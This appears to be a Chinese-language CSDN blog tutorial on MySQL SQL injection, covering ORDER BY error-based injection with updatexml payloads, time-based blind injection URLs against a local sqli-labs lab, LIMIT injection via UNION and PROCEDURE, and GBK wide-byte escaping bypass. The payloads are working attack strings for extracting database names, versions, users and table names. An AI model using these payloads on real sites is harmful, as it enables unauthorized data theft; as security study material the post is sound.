# order by注入与limit注入,以及宽字节注入order by

已于 2022-08-23 17:46:49 修改
阅读量300 收藏
点赞数
分类专栏: 学习 文章标签: 数据库 mysql sql
于 2022-08-10 20:49:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52397172/article/details/126273564
版权

order by注入与limit注入,以及宽字节注入order by

order by是mysql中对查询数据进行排序的方法,利用order by子句进行快速猜解列数,再配合union select语句进行回显。可以通过修改order参数为较大的整数看回显情况来判断。在不知道列名的情况下可以通过列的的序号来指代相应的列
正常的order by语句:

select * from users order by id desc;

而有order by注入出我们需要的信息
1.如果有报错信息输出,可尝试通过报错注入完成sql注入攻击
2.如果没有回显,可尝试盲注的手法来注入

order by注入(都是有回显)

1.获取当前的数据库的列表:

select * from users order by id and(updatexml(1,concat(0x7e,(select database()),0x7e),1));

2.获取数据库的版本号

select * from users order by id and(updatexml(1,concat(0x7e,(select version()),0x7e),1));

3.获取用户

select * from users order by id and(updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.获取数据库个数

select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));

5.获取数据库列表信息

select * from users order by id and(updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),0));

6.获取表的名字

select * from users order by id and(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = "security" limit 0,1),0x7e),0));

基于时间的盲注(无回显)
如下没有回显可以通过进程时间来判断数据库名的长度(注意我这是自己测试用的是等号,实际上是可以用<来判断的)

http://127.0.0.1/sqli-labs/Less-9/?id=1'and if(length(database())=8,sleep(10),1)--+

以下就是正常的order by通过sleep进行判断的

order by if(1=1,1,sleep(1))
select * from hehe order by if(1=1,1,sleep(1)); #正常时间
select * from hehe order by if(1=2,1,sleep(1)); #有延迟

而且通过substr截取数据字母在用ascii码进行转码通过进程时间来判断

ascii() :
http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(10),1)--+

limit【此方法适用于<=MySQL 5.5中,在limit语句后面的注入 】

1、limit的使用语法

LIMIT[位置偏移量,]行数;这里的中括号里的数据是可以修改的参数,也就是指的是从哪一行开始显示,并且他的开始值是0,也就是第一条记录对应的索引数是0,第二条记录对应的索引数是1…;后面的行数就是返回记录的条数,一般情况下都是写的1。

没有order by

执行语句 select id from users limit 0,1; 
这种情况下的 limit 后面可以使用union进行联合查询注入
执行语句 select id from users limit 0,1 union select username from users;

存在 order by

此方法适用于5.0.0< MySQL <5.6.6版本,在limit语句后面的注入
limit 关键字后面还可跟PROCEDURE和 INTO两个关键字,但是 INTO 后面写入文件需要知道绝对路径以及写入shell的权限,因此利用比较难,因此这里以PROCEDURE为例进行注入,使用 PROCEDURE函数进行注入,ANALYSE支持两个参数。

宽字节注入

定义:正常情况下GPC开启或者使用addslashes函数过滤GET或POST提交的参数时,我们测试输入的’,就会被转义为’,无法成功闭合或者说逃逸。一般这种情况是不存在注入可能的,但是有一种情况除外,就是当后台数据库编码格式为GBK时,可以添加字符欺骗转义函数,'等不被转义。
宽字节注入是利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字
当某字符的大小为一个字节时,称其字符为窄字节.
当某字符的大小为两个字节时,称其字符为宽字节.
所有英文默认占一个字节,汉字占两个字节
常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等
GBK编码,是对GB2312编码的扩展,用于存储汉字。GBK编码采用双字节编码方案,其编码范围:8140- FEFE
宽字节注入的产生是字符集不一致造成的,如:前端使用UTF-8编码,数据库使用GBK编码,在进行解码时,数据库将两位的UTF-8编码读取成一位GBK编码,从而绕过服务器的转义函数,进行的sql注入。

努力的老张
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入order by ,limit字节注入
Miracle_ze的博客
08-09 892
定义:正常情况下GPC开启或者使用addslashes函数过滤GET或POST提交的参数时,我们测试输入的’,就会被转义为’,无法成功闭合或者说逃逸。一般这种情况是不存在注入可能的,但是有一种情况除外,就是当后台数据库编码格式为GBK时,可以添加字符欺骗转义函数,'等不被转义。适用情形:(1)数据库的编码格式为GBK;(2)在PHP中,通过iconv()进行编码转换。原理:加入字节与\构成GBK编码,实现单引号和双引号逃逸。.........
SQL注入基础---order by \ limit \ 字节注入
qq_52016943的博客
08-09 1003
order by 、limit字节注入
SQL注入order by注入limit注入
m0_46467017的博客
08-09 4452
在MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序) select * from 表名 order by 列名(或者数字) desc;降序假设有以下用户表当我们使用命令的时候,是将users这张表按照username这一列进行升序,结果就变成了;...
order by注入limit注入
lml_0916的博客
08-08 1718
在数据库中,order by的作用是对数据表中查询的数据进行排序的方式。正常情况下我们去查询一个数据库的时候,它显示的顺序可能是根据插入的数据来进行排序的,所以可以通过order by进行排序,方便查看select * from 表名 order by 列名(数字) asc;(升序的) select * from 表名 order by 列名(数字) desc;(降序的)举个例子:正常情况下,用户表的排名是这样的当我们使用命令。...
Java代码审计之JDBC中的sql注入
liguangyao213的博客
02-27 543
java代码审计系统课程--代码审计视频教程-信息安全-CSDN程序员研修院少写“漏洞” 了解常见代码安全 提升代码安全能力 代码不被黑客黑-https://edu.csdn.net/course/detail/32634 漏洞原理: 在常见的web漏洞中,SQL注入漏洞较为常见,危害也较大。攻击者一旦利用系统中存在的SQL注入漏洞来发起攻击,在条件允许的情况下,不仅可以获取整站数据,还可通过进一步的渗透来获取服务器权限,从而进入内网。 注入攻击的本质,是把用户输入的数据当做代码执行。这里有两个关键条
16“order by”是怎么工作的?.pptx
09-20
当执行`SELECT city, name, age FROM t WHERE city=&#39;杭州&#39; ORDER BY name LIMIT 1000;`这样的查询时,MySQL会首先根据`city`索引找到所有城市为“杭州”的记录。如果查询结果需要排序(如`ORDER BY name`),且结果...
Oracle与MySQL的几点区别.docx
12-16
- 在 MySQL 中,组函数(如 COUNT、SUM 等)可以在 SELECT 语句中与非聚合列一起使用,但 Oracle 要求如果使用了组函数,其他列要么也使用组函数处理,要么出现在 GROUP BY 子句中。例如,`SELECT name, COUNT...
orcle与mysql的sql语法区别.docx
12-16
- 语句二:`SELECT * FROM (( SELECT ROWNUM AS NUMROW, c.* from (select [FIELD_NAME,...] FROM TABLE_NAME WHERE 条件 1 ORDER BY 条件 2) c) WHERE NUMROW > 80 AND NUMROW ) ORDER BY 条件 3;` 10. 长字符串...
Oracle与MySQL的几点区别.pdf
12-16
FROM (SELECT [FIELD_NAME,...] FROM TABLE_NAME WHERE 条件 1 ORDER BY 条件 2) c WHERE NUMROW BETWEEN 起始行数 AND 结束行数 ) ORDER BY 条件 3; ``` 5. **长字符串处理**: Oracle 对 INSERT 和 UPDATE ...
oracle与mysql的区别
01-21
Oracle 与 MySQL 的区别 Oracle 和 MySQL 是两种最流行的关系型数据库管理系统,它们之间有许多相同点和不同点。了解它们的优缺点和使用特点对于选择合适的数据库管理系统非常重要。 相同点 1. 都是关系型数据库...
【SQL】sql注入风险修复方法
qq_34335450的博客
06-13 3328
一、MyBaties中#{}和${}的区别 '#'相当于对数据 加上 双引号,$相当于直接显示数据。 我们经常使用的是#{},一般解说是因为这种方式可以防止SQL注入,简单的说#{}这种方式SQL语句是经过预编译的,它是把#{}中间的参数转义成字符串,举例: select * from table_A where name = #{name} 预编译后,会动态解析成一个参数标记符?: select * from table_A where name = ? 而使用${}在动态解析时候,会传入参数字符串
字节注入
硫酸超的博客
08-07 5323
字节注入函数介绍字符集MySQL字符转换字节注入普通注入字节get注入字节get注入2.0字节post注入2.0字节注入防御 函数介绍 PHP mysql_real_escape_string() 函数 PHP addslashes() 函数 字符集 在了解字节注入之前,我们先来看一看字符集是什么。字符集也叫字符编码,是一种将符号转换为二进制数的映射关系。 几种常见的字符集: ASCII编码:单字节编码 0x00 null 0x20 0x21 ! 0x22 " 0x23 # 0x24 $ 0x
mybatis的#{}和${}的区别以及order by注入问题
weixin_30512043的博客
07-01 98
#{}相当于jdbc中的preparedstatement ${}是输出变量的值 你可能说不明所以,不要紧我们看2段代码: String sql = "select * from admin_domain_location order by ?"; PreparedStatement st = con.prepareStatement(sql); st.setString(1, "dom...
记录一次可能的order by注入
分享博主日常学习和使用的一些技术
04-08 183
这是我在mysql注入领域第一滴血的故事。 当然了,利用别人的缺点并不是一件光彩的事,不过感觉确实挺爽。 起因和过程 需求上有个根据表格字段进行排序的功能。 我观察接口发现接口,有个请求参数叫做orderColumn,而且传了一个字符串,所以我有理由相信orderColumn的值对应着数据库里面的字段,果不其然,试了试,这是一个sql注入点,但是这个注入点不是100%可以被利用,我需要一步一步往下走。 我修改了几个数值,orderColumn设置为如下的几个值 1, 2,3数字 字符串,猜测列名id, te
order by注入
Shanfenglan's blog
03-09 1014
文章目录 MySQL Order By 注入总结
Order by注入
qq_40710190的博客
07-01 4178
MySQL order by注入
EL表达式的#{}接收order by排序字段报错
qq_44471588的博客
07-15 430
是不会加引号的,因为它传入是int型。而如果传入String用#{}加入到SQL语句中会自动加引号。总结如果用EL表达式传入的是用于字段比较的信息,$和#都可以用,区别只是防范SQL注入的安全问题,至于两者之间安全性差别,老生常谈了这里不再赘述。而对于接收到的字符串,网上都说。会对传入的数据自动加引号,而实际测试发现是根据其类型判断是否加一个双引号。...
玩得一手好注入order by排序篇
weixin_34107955的博客
01-30 1057
看了之前Gr36_前辈在先知上的议题,其中有提到排序注入,这个在最近经常遇到这样的问题,所以先总结下order by 排序注入的知识。                             0×00 背景 看了之前Gr36_前辈在先知上的议题,其中有提到排序注入,这个在最近经常遇到这样的问题,所以先总结下order by 排序注入的知识。    0×01 环境信息 测试环境:操作系统ubunt...
给你一个order by注入点,你能否脱下整个数据库?
分享博主日常学习和使用的一些技术
07-14 231
故事背景 页面中有如下的表格,可以根据不同的列进行排序,这种动态的需求,开发人员往往使用最简单粗暴的方式来实现,也就给我可乘之机,一个未曾校验的疏忽,也许就是一个G的数据泄露。 我观察了此页面对应的接口,果然如此,orderColumn参数映入我的眼帘,那一刻我觉得世界都变得明亮了。我呼吸变得急促了,因为我知道,这有可能是我在sql注入领域的第一次实战。其兴奋程度完全不亚于我当年第一次遇到xss的时候,具体博文见我的第一个xss攻击 牛刀小试 上面说到我猜测orderColumn可能是个注入点,但是我不
ByteBuffer 转字节序 报错java.nio.BufferUnderflowException
最新发布
03-30
可以使用buf.limit()方法获取缓冲区的限制,buf.position()方法获取当前位置,以便检查读取的字节数是否超过了缓冲区的限制。 ```java ByteBuffer buf = ByteBuffer.wrap(bytes); buf.order(ByteOrder.BIG_ENDIAN);...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值